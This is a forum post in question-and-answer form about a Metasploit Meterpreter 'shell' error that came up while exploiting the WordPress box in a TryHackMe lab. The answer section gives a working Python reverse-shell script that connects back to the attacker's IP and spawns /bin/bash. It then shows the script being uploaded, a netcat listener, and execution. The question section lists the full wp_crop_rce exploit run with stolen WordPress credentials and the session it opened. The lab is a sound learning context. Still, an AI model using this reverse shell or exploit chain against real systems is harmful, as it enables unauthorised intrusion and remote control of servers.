1Kas
The "Shell" command does not work in Meterpreter [closed]
I would like to share the solution I have used in this issue
Scenario:
meterpreter > ?
Stdapi: System Commands
=======================
Command Description
------- -----------
shell Drop into a system command shell
// In this case, I would like to use the shell command.
meterpreter > shell
[-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments
// But after inputting the shell command, it returns an error.
You are required to create a reverse_shell.py to access the shell. Here are the steps:
Create reverse_shell.py. Remember to replace the information (IP, Port)
# reverse_shell.py
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("<YOUR_IP>", <YOUR_PORT>))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/bash", "-i"])
Upload the Script to the Target
meterpreter > upload /home/kali/Downloads/reverse_shell.py /tmp/reverse_shell.py
[*] Uploading : /home/kali/Downloads/reverse_shell.py -> /tmp/reverse_shell.py
[*] Uploaded -1.00 B of 243.00 B (-0.41%): /home/kali/Downloads/reverse_shell.py -> /tmp/reverse_shell.py
[*] Completed : /home/kali/Downloads/reverse_shell.py -> /tmp/reverse_shell.py
Set Up a NetCat Listener on Your Local Machine (Another Terminal)
nc -lvnp <YOUR_PORT> -t
Execute it!
meterpreter > execute -f /usr/bin/python3 -a /tmp/reverse_shell.py
Process 1576 created.
You should see the shell command output from the Netcat reverse shell (another terminal)
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1560 -t
listening on [any] 1560 ...
connect to [10.4.109.11] from (UNKNOWN) [10.10.189.47] 60642
bash: cannot set terminal process group (925): Inappropriate ioctl for device
bash: no job control in this shell
www-data@blog:/var/www/wordpress$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<ss$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@blog:/var/www/wordpress$
Additional: You are required to run this command in the reverse shell only if you are attempting to log in to MySQL.
python3 -c 'import pty; pty.spawn("/bin/bash")'
Question: I am learning to use the Metasploit to exploit a WordPress website provided by TryHackMe.com https://tryhackme.com/r/room/blog
I am having difficulties with my meterpreter. It always returns an error when I enter a shell command.
meterpreter > shell
[-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments
I have no idea why mine returns an error while the guidance from YouTube does not, as I follow the exact instructions. https://www.youtube.com/watch?v=zmK_hg6hIM0&t=166s
Any comments are welcome and much appreciated. Thanks guys.
Here are the complete commands.
msf6 > search wordpress date:2019
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/wp_db_backup_rce 2019-04-24 excellent Yes WP Database Backup RCE
1 \_ target: Windows . . . .
2 \_ target: Linux . . . .
3 exploit/multi/http/wp_crop_rce 2019-02-19 excellent Yes WordPress Crop-image Shell Upload
4 auxiliary/scanner/http/wp_email_sub_news_sqli 2019-11-13 normal No WordPress Email Subscribers and Newsletter Hash SQLi Scanner
5 auxiliary/admin/http/wp_google_maps_sqli 2019-04-02 normal Yes WordPress Google Maps Plugin SQL Injection
Interact with a module by name or index. For example info 5, use 5 or use auxiliary/admin/http/wp_google_maps_sqli
msf6 > use exploit/multi/http/wp_crop_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_crop_rce) > show options
Module options (exploit/multi/http/wp_crop_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metaspl
oit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
THEME_DIR no The WordPress theme dir name (disable theme auto-detection if provided
)
USERNAME yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/wp_crop_rce) > set RHOSTS blog.thm
RHOSTS => blog.thm
msf6 exploit(multi/http/wp_crop_rce) > set LHOST 10.4.109.11
LHOST => 10.4.109.11
msf6 exploit(multi/http/wp_crop_rce) > set LPORT 1560
LPORT => 1560
msf6 exploit(multi/http/wp_crop_rce) > set USERNAME kwheel
USERNAME => kwheel
msf6 exploit(multi/http/wp_crop_rce) > set PASSWORD cutiepie1
PASSWORD => cutiepie1
msf6 exploit(multi/http/wp_crop_rce) > run
[*] Started reverse TCP handler on 10.4.109.11:1560
[*] Authenticating with WordPress using kwheel:cutiepie1...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (40004 bytes) to 10.10.189.47
[*] Meterpreter session 1 opened (10.4.109.11:1560 -> 10.10.189.47:60582) at 2024-11-01 15:40:30 -0400
[*] Attempting to clean up files...
meterpreter > shell
[-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments
meterpreter > shell
[-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments
meterpreter > ls
Listing: /var/www/wordpress
===========================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100640/rw-r----- 235 fil 2020-05-28 08:15:42 -0400 .htaccess
100640/rw-r----- 235 fil 2020-05-27 23:44:26 -0400 .htaccess_backup
100640/rw-r----- 418 fil 2013-09-24 20:18:11 -0400 index.php
100640/rw-r----- 19935 fil 2020-05-26 11:39:37 -0400 license.txt
100644/rw-r--r-- 1112 fil 2024-11-01 15:40:25 -0400 ofVQZvznEI.php
100640/rw-r----- 7415 fil 2020-05-26 11:39:37 -0400 readme.html
100640/rw-r----- 5458 fil 2020-05-26 11:39:37 -0400 wp-activate.php
040750/rwxr-x--- 4096 dir 2018-12-06 13:00:07 -0500 wp-admin
100640/rw-r----- 364 fil 2015-12-19 06:20:28 -0500 wp-blog-header.php
100640/rw-r----- 1889 fil 2018-05-02 18:11:25 -0400 wp-comments-post.php
100640/rw-r----- 2853 fil 2015-12-16 04:58:26 -0500 wp-config-sample.php
100640/rw-r----- 3279 fil 2020-05-27 23:49:17 -0400 wp-config.php
040750/rwxr-x--- 4096 dir 2020-05-25 23:52:32 -0400 wp-content
100640/rw-r----- 3669 fil 2017-08-20 00:37:45 -0400 wp-cron.php
040750/rwxr-x--- 12288 dir 2018-12-06 13:00:08 -0500 wp-includes
100640/rw-r----- 2422 fil 2016-11-20 21:46:30 -0500 wp-links-opml.php
100640/rw-r----- 3306 fil 2017-08-22 07:52:48 -0400 wp-load.php
100640/rw-r----- 37286 fil 2020-05-26 11:39:37 -0400 wp-login.php
100640/rw-r----- 8048 fil 2017-01-11 00:13:43 -0500 wp-mail.php
100640/rw-r----- 17421 fil 2018-10-23 03:04:39 -0400 wp-settings.php
100640/rw-r----- 30091 fil 2018-04-29 19:10:26 -0400 wp-signup.php
100640/rw-r----- 4620 fil 2017-10-23 18:12:51 -0400 wp-trackback.php
100640/rw-r----- 3065 fil 2016-08-31 12:31:29 -0400 xmlrpc.php
meterpreter >
